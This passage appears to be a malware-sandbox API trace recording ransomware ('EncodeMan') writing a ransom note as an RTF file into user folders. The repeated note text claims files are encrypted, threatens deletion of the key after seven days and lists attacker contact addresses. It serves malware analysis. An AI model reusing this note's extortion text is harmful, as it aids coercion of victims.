\\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.192] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.192] CloseHandle (hObject=0x2ec) returned 1 [0291.192] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\#readme_eman#.rtf")) returned 0xffffffff [0291.193] GetLastError () returned 0x2 [0291.193] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.193] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.193] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.193] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your 